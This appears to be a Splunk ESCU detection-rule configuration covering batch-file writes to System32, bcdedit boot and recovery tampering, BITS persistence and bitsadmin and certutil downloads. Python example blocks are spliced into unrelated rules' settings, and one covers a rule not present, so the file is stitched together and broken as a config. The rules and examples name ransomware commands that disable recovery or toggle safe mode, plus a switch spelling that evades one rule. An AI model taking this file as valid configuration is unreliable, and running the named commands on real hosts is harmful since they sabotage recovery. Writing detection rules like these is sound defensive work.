description = The search looks for a batch file (.bat) written to the Windows system directory tree (System32 or SysWOW64).
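An added example, not ESCU code, of the `ESCU - Auto Admin Logon Registry Entry - Rule` match conditions in Python over constructed `Endpoint.Registry` rows. It also shows a gap worth knowing: the rule requires `registry_value_data=1`, but when the value is written as a REG_DWORD, Sysmon event 13 renders the data as `DWORD (0x00000001)`, which a literal comparison misses. The `normalize_dword` flag is this example's addition and not part of the rule; the hosts and GUIDs are constructed.

```python
import fnmatch
import re

WINLOGON_PATH_PATTERN = "*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*"
SYSMON_DWORD = re.compile(r"DWORD \((0x[0-9A-Fa-f]+)\)")  # how Sysmon event 13 renders REG_DWORD data


def spl_match(value, pattern):
    """Case-insensitive SPL-style wildcard match; only `*` is used in these patterns."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def auto_admin_logon_registry_entry(events, normalize_dword=False):
    """Winlogon path AND value name AutoAdminLogon AND value data 1.

    normalize_dword=True is an addition to the rule: it folds Sysmon's
    "DWORD (0x00000001)" rendering down to "1" before the comparison.
    """
    hits = []
    for ev in events:
        if not spl_match(ev["registry_path"], WINLOGON_PATH_PATTERN):
            continue
        if ev["registry_value_name"].lower() != "autoadminlogon":
            continue
        data = ev["registry_value_data"]
        if normalize_dword:
            m = SYSMON_DWORD.fullmatch(data)
            if m:
                data = str(int(m.group(1), 16))
        if data != "1":
            continue  # "0" (reverting the setting) and other values are not matched
        hits.append(ev)
    return hits


WINLOGON = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"
SAMPLE_EVENTS = [  # constructed Endpoint.Registry rows in Sysmon event 13 style
    {"dest": "ws01", "registry_path": WINLOGON + "\\AutoAdminLogon", "registry_key_name": WINLOGON,
     "registry_value_name": "AutoAdminLogon", "registry_value_data": "1", "process_guid": "{g1}"},
    {"dest": "ws02", "registry_path": WINLOGON + "\\AutoAdminLogon", "registry_key_name": WINLOGON,
     "registry_value_name": "AutoAdminLogon", "registry_value_data": "DWORD (0x00000001)", "process_guid": "{g2}"},
    {"dest": "ws03", "registry_path": WINLOGON + "\\AutoAdminLogon", "registry_key_name": WINLOGON,
     "registry_value_name": "AutoAdminLogon", "registry_value_data": "0", "process_guid": "{g3}"},
    # Same key, sibling value: not matched by the rule, but the value an analyst should pull next,
    # since AutoAdminLogon only works with DefaultUserName/DefaultPassword set alongside it.
    {"dest": "ws04", "registry_path": WINLOGON + "\\DefaultPassword", "registry_key_name": WINLOGON,
     "registry_value_name": "DefaultPassword", "registry_value_data": "Hunter2!", "process_guid": "{g1}"},
]

if __name__ == "__main__":
    print("rule as written:", [h["dest"] for h in auto_admin_logon_registry_entry(SAMPLE_EVENTS)])
    print("with DWORD folding:", [h["dest"] for h in auto_admin_logon_registry_entry(SAMPLE_EVENTS, True)])
```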
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204", "T1204.002"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The search looks for a batch file (.bat) written to the Windows system directory tree (System32 or SysWOW64).
action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on processes that includes the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node, and file write events into the `Filesystem` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product.
action.escu.known_false_positives = It is possible for this search to generate a notable event for a batch file write to a path that includes the string "system32", but is not the actual Windows system directory. As such, you should confirm the path of the batch file identified by the search. In addition, a false positive may be generated by an administrator copying a legitimate batch file in this directory tree. You should confirm that the activity is legitimate and modify the search to add exclusions, as necessary.
action.escu.creation_date = 2023-04-11
action.escu.modification_date = 2023-04-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Batch File Write to System32 - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["SamSam Ransomware"]
action.risk = 1
action.risk.param._risk_message = A batch file $file_name$ was written to the system32 directory tree on endpoint $dest$ by user $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "file_name", "risk_object_type": "other", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Batch File Write to System32 - Rule
action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204", "T1204.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The search looks for a batch file (.bat) written to the Windows system directory tree (System32 or SysWOW64).
action.notable.param.rule_title = Batch File Write to System32
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=* by _time span=1h Processes.process_guid Processes.process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | join process_guid [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*\\system32\\*", "*\\syswow64\\*") Filesystem.file_name="*.bat" by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid | `drop_dm_object_name(Filesystem)`] | table dest user file_create_time file_name file_path process_name firstTime lastTime | dedup file_create_time | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `batch_file_write_to_system32_filter`

[ESCU - Bcdedit Command Back To Normal Mode Boot - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a suspicious bcdedit command line that returns the host from safe mode to its normal boot configuration (`bcdedit /deletevalue {current} safeboot`). BlackMatter ransomware forces the compromised host to boot into safe mode to continue its encryption, then restores normal boot with this command. It is a good alert for a host that was forcibly booted into safe mode, since the boot configuration must be modified to bring it back to normal.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects a suspicious bcdedit command line that returns the host from safe mode to its normal boot configuration (`bcdedit /deletevalue {current} safeboot`). BlackMatter ransomware forces the compromised host to boot into safe mode to continue its encryption, then restores normal boot with this command. It is a good alert for a host that was forcibly booted into safe mode, since the boot configuration must be modified to bring it back to normal.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-09-06
action.escu.modification_date = 2021-09-06
action.escu.confidence = high
action.escu.full_search_name = ESCU - Bcdedit Command Back To Normal Mode Boot - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["BlackMatter Ransomware"]
action.risk = 1
action.risk.param._risk_message = bcdedit process with command line $process$ restored the normal boot configuration on $dest$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Bcdedit Command Back To Normal Mode Boot - Rule
action.correlationsearch.annotations = {"analytic_story": ["BlackMatter Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a suspicious bcdedit command line that returns the host from safe mode to its normal boot configuration (`bcdedit /deletevalue {current} safeboot`). BlackMatter ransomware forces the compromised host to boot into safe mode to continue its encryption, then restores normal boot with this command. It is a good alert for a host that was forcibly booted into safe mode, since the boot configuration must be modified to bring it back to normal.
action.notable.param.rule_title = Bcdedit Command Back To Normal Mode Boot
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe Processes.process="*/deletevalue*" Processes.process="*{current}*" Processes.process="*safeboot*" by Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bcdedit_command_back_to_normal_mode_boot_filter`

[ESCU - BCDEdit Failure Recovery Modification - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for bcdedit.exe invocations that disable the built-in Windows error recovery boot configuration (`bcdedit /set {default} recoveryenabled no`). Ransomware typically does this to prevent recovery of the host.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for bcdedit.exe invocations that disable the built-in Windows error recovery boot configuration (`bcdedit /set {default} recoveryenabled no`). Ransomware typically does this to prevent recovery of the host.
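An added example (not ESCU code) of the `ESCU - Batch File Write to System32 - Rule` logic above: a Filesystem-to-Processes join on `process_guid`, the `*.bat` and `\system32\`/`\syswow64\` path filters, and the trailing `dedup file_create_time`. The `strict` option implements the path confirmation the rule's known-false-positives note asks for and assumes the default `C:\Windows` system root; the `dedup_create_time` switch exists only to show what the dedup step discards. All rows, hosts, users and GUIDs are constructed.

```python
import fnmatch

SYSTEM_DIR_PATTERNS = ("*\\system32\\*", "*\\syswow64\\*")
# Assumed default system root; the rule itself only does the substring match above.
REAL_SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def spl_match(value, pattern):
    """Case-insensitive SPL-style wildcard match; only `*` is used in these patterns."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def batch_file_write_to_system32(process_events, filesystem_events, strict=False, dedup_create_time=True):
    """Filesystem rows for *.bat under system32/syswow64, joined to the Processes row with the
    same process_guid (inner join, first match), then `dedup file_create_time`."""
    by_guid = {}
    for p in process_events:
        by_guid.setdefault(p["process_guid"], p)  # `join` keeps the first matching row
    results, seen = [], set()
    for f in filesystem_events:
        if not spl_match(f["file_name"], "*.bat"):
            continue
        if not any(spl_match(f["file_path"], pat) for pat in SYSTEM_DIR_PATTERNS):
            continue
        if strict and not f["file_path"].lower().startswith(REAL_SYSTEM_DIRS):
            continue  # "system32" somewhere in a user path is not the Windows directory
        p = by_guid.get(f["process_guid"])
        if p is None:
            continue  # no Processes row for this GUID: the inner join drops the write
        if dedup_create_time:
            if f["file_create_time"] in seen:
                continue
            seen.add(f["file_create_time"])
        results.append({"dest": f["dest"], "user": p["user"], "process_name": p["process_name"],
                        "file_name": f["file_name"], "file_path": f["file_path"],
                        "file_create_time": f["file_create_time"]})
    return results


PROCESS_EVENTS = [  # constructed Endpoint.Processes rows
    {"process_guid": "{g1}", "process_name": "powershell.exe", "dest": "srv01", "user": "CORP\\svc-deploy"},
    {"process_guid": "{g2}", "process_name": "robocopy.exe",   "dest": "srv02", "user": "CORP\\admin"},
    {"process_guid": "{g3}", "process_name": "cmd.exe",        "dest": "srv03", "user": "CORP\\svc-build"},
]
FILESYSTEM_EVENTS = [  # constructed Endpoint.Filesystem rows; file_create_time is epoch seconds
    {"process_guid": "{g1}", "dest": "srv01", "file_name": "run.bat",
     "file_path": "C:\\Windows\\System32\\run.bat", "file_create_time": 1700000011},
    {"process_guid": "{g2}", "dest": "srv02", "file_name": "deploy.bat",
     "file_path": "C:\\Users\\admin\\system32\\deploy.bat", "file_create_time": 1700000021},  # documented FP
    {"process_guid": "{g3}", "dest": "srv03", "file_name": "x.bat",
     "file_path": "C:\\Windows\\SysWOW64\\x.bat", "file_create_time": 1700000011},           # same second as run.bat
    {"process_guid": "{g9}", "dest": "srv04", "file_name": "z.bat",
     "file_path": "C:\\Windows\\System32\\z.bat", "file_create_time": 1700000041},           # no Processes row
    {"process_guid": "{g1}", "dest": "srv01", "file_name": "notes.txt",
     "file_path": "C:\\Windows\\System32\\notes.txt", "file_create_time": 1700000012},       # not a .bat
]

if __name__ == "__main__":
    for r in batch_file_write_to_system32(PROCESS_EVENTS, FILESYSTEM_EVENTS):
        print(f"{r['dest']} {r['user']} {r['process_name']} wrote {r['file_path']}")
```

Two rows are there to show the rule's rough edges: `C:\Users\admin\system32\deploy.bat` matches because the path filter is a substring test, and the SysWOW64 write on srv03 is silently dropped because `dedup file_create_time` keys on a timestamp that another host's file happens to share.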
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators may modify the boot configuration.
action.escu.creation_date = 2020-12-21
action.escu.modification_date = 2020-12-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - BCDEdit Failure Recovery Modification - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ryuk Ransomware", "Ransomware"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to disable the ability to recover the endpoint.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - BCDEdit Failure Recovery Modification - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ryuk Ransomware", "Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for bcdedit.exe invocations that disable the built-in Windows error recovery boot configuration (`bcdedit /set {default} recoveryenabled no`). Ransomware typically does this to prevent recovery of the host.
action.notable.param.rule_title = BCDEdit Failure Recovery Modification
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe Processes.process="*recoveryenabled*" (Processes.process="* no*") by Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bcdedit_failure_recovery_modification_filter`

[ESCU - BITS Job Persistence - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following query identifies the Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume, or add a file to a BITS job. These are typically seen combined in a one-liner or run in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files, and this may require further network data analysis to identify. You can use `bitsadmin /list /verbose` to list the jobs during investigation.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1197"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following query identifies the Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume, or add a file to a BITS job. These are typically seen combined in a one-liner or run in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files, and this may require further network data analysis to identify. You can use `bitsadmin /list /verbose` to list the jobs during investigation.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives will be present. Typically, applications will use `BitsAdmin.exe`. Any filtering should be done based on command-line arguments (legitimate applications) or parent process.
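An added example that serves both bcdedit rules above (`ESCU - Bcdedit Command Back To Normal Mode Boot - Rule` and `ESCU - BCDEdit Failure Recovery Modification - Rule`); it is not ESCU code. It applies each rule's substring conditions to constructed `bcdedit` command lines and includes the neighbouring commands that neither rule matches: the `safeboot minimal` leg that forces safe mode, the `bootstatuspolicy ignoreallfailures` companion that usually accompanies `recoveryenabled no`, a wrapper `cmd.exe` row, and a dash-prefixed switch (`-deletevalue`, which bcdedit also accepts) that slips past `*/deletevalue*`.

```python
import fnmatch


def spl_match(value, pattern):
    """Case-insensitive SPL-style wildcard match; only `*` is used in these patterns."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def bcdedit_back_to_normal_mode_boot(ev):
    """process_name=bcdedit.exe AND */deletevalue* AND *{current}* AND *safeboot*"""
    return (ev["process_name"].lower() == "bcdedit.exe"
            and all(spl_match(ev["process"], p) for p in ("*/deletevalue*", "*{current}*", "*safeboot*")))


def bcdedit_failure_recovery_modification(ev):
    """process_name=bcdedit.exe AND *recoveryenabled* AND "* no*" (any BCD entry, e.g. {default})"""
    return (ev["process_name"].lower() == "bcdedit.exe"
            and spl_match(ev["process"], "*recoveryenabled*")
            and spl_match(ev["process"], "* no*"))


def classify(events):
    """Tag each row with the rule(s) it trips; rows that trip neither are omitted."""
    out = []
    for ev in events:
        tags = []
        if bcdedit_back_to_normal_mode_boot(ev):
            tags.append("back_to_normal_boot")
        if bcdedit_failure_recovery_modification(ev):
            tags.append("recovery_disabled")
        if tags:
            out.append({"dest": ev["dest"], "process": ev["process"], "tags": tags})
    return out


SAMPLE_EVENTS = [  # constructed Endpoint.Processes rows
    {"dest": "ws01", "user": "SYSTEM", "parent_process_name": "cmd.exe", "process_name": "bcdedit.exe",
     "process": "bcdedit /deletevalue {current} safeboot"},
    {"dest": "ws02", "user": "CORP\\admin", "parent_process_name": "cmd.exe", "process_name": "bcdedit.exe",
     "process": "bcdedit.exe /set {default} recoveryenabled No"},
    {"dest": "ws03", "user": "CORP\\admin", "parent_process_name": "cmd.exe", "process_name": "bcdedit.exe",
     "process": "bcdedit /set {default} bootstatuspolicy ignoreallfailures"},  # usual companion, not covered
    {"dest": "ws04", "user": "SYSTEM", "parent_process_name": "cmd.exe", "process_name": "bcdedit.exe",
     "process": "bcdedit /set {current} safeboot minimal"},                     # the safe-mode leg, not covered
    {"dest": "ws05", "user": "CORP\\admin", "parent_process_name": "cmd.exe", "process_name": "bcdedit.exe",
     "process": "bcdedit /set {default} recoveryenabled Yes"},                  # restoring recovery
    {"dest": "ws06", "user": "SYSTEM", "parent_process_name": "services.exe", "process_name": "cmd.exe",
     "process": "cmd.exe /c bcdedit /deletevalue {current} safeboot"},          # wrapper row; the child bcdedit row matches
    {"dest": "ws07", "user": "SYSTEM", "parent_process_name": "cmd.exe", "process_name": "bcdedit.exe",
     "process": "bcdedit -deletevalue {current} safeboot"},                     # dash switch evades "*/deletevalue*"
]

if __name__ == "__main__":
    for r in classify(SAMPLE_EVENTS):
        print(f"{r['dest']}: {r['tags']}: {r['process']}")
```

If you extend `bcdedit_command_back_to_normal_mode_boot_filter` or the search itself, the ws07 row is the one to test against: matching `*deletevalue*` without the slash closes that gap without widening the rule in any other way.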
action.escu.creation_date = 2021-09-16
action.escu.modification_date = 2021-09-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - BITS Job Persistence - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["BITS Jobs", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to persist using BITS.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - BITS Job Persistence - Rule
action.correlationsearch.annotations = {"analytic_story": ["BITS Jobs", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1197"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following query identifies the Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume, or add a file to a BITS job. These are typically seen combined in a one-liner or run in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files, and this may require further network data analysis to identify. You can use `bitsadmin /list /verbose` to list the jobs during investigation.
action.notable.param.rule_title = BITS Job Persistence
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process IN (*create*, *addfile*, *setnotifyflags*, *setnotifycmdline*, *setminretrydelay*, *setcustomheaders*, *resume* ) by Processes.dest Processes.user Processes.original_file_name Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bits_job_persistence_filter`

[ESCU - BITSAdmin Download File - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following query identifies the Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` using the `transfer` parameter to download a remote object. In addition, look for `download` or `upload` on the command line; these switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically, once executed, a follow-on command will be used to execute the dropped file. Note that the related network connection and file modification events will not originate from `bitsadmin.exe`; the artifacts appear in a parallel `svchost.exe` process with a command line similar to `svchost.exe -k netsvcs -s BITS`. It is important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use `bitsadmin /list /verbose` to list the jobs during investigation.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation", "Command and Control"], "mitre_attack": ["T1197", "T1105"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following query identifies the Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` using the `transfer` parameter to download a remote object. In addition, look for `download` or `upload` on the command line; these switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically, once executed, a follow-on command will be used to execute the dropped file. Note that the related network connection and file modification events will not originate from `bitsadmin.exe`; the artifacts appear in a parallel `svchost.exe` process with a command line similar to `svchost.exe -k netsvcs -s BITS`. It is important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use `bitsadmin /list /verbose` to list the jobs during investigation.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives, however it may be required to filter based on parent process name or network connection.
action.escu.creation_date = 2022-11-29
action.escu.modification_date = 2022-11-29
action.escu.confidence = high
action.escu.full_search_name = ESCU - BITSAdmin Download File - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ingress Tool Transfer", "BITS Jobs", "DarkSide Ransomware", "Living Off The Land", "Flax Typhoon"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to download a file.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - BITSAdmin Download File - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ingress Tool Transfer", "BITS Jobs", "DarkSide Ransomware", "Living Off The Land", "Flax Typhoon"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation", "Installation", "Command and Control"], "mitre_attack": ["T1197", "T1105"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` using the `transfer` parameter to download a remote object. In addition, look for `download` or `upload` on the command-line; these switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically, once executed, a follow-on command will be used to execute the dropped file. Note that the related network connection or file modification events will not originate from `bitsadmin.exe`; the artifacts will instead appear under a parallel `svchost.exe` process with a command-line similar to `svchost.exe -k netsvcs -s BITS`. It is important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use `bitsadmin /list /verbose` to list out the jobs during investigation.
action.notable.param.rule_title = BITSAdmin Download File
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process IN ("*transfer*", "*addfile*") by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bitsadmin_download_file_filter`

[ESCU - CertUtil Download With URLCache and Split Arguments - Rule]
action.escu = 0
action.escu.enabled = 1
description = Certutil.exe may download a file from a remote destination using `-urlcache`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. However, it is uncommon for `certutil.exe` to write files to world-writable paths.\
During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question.
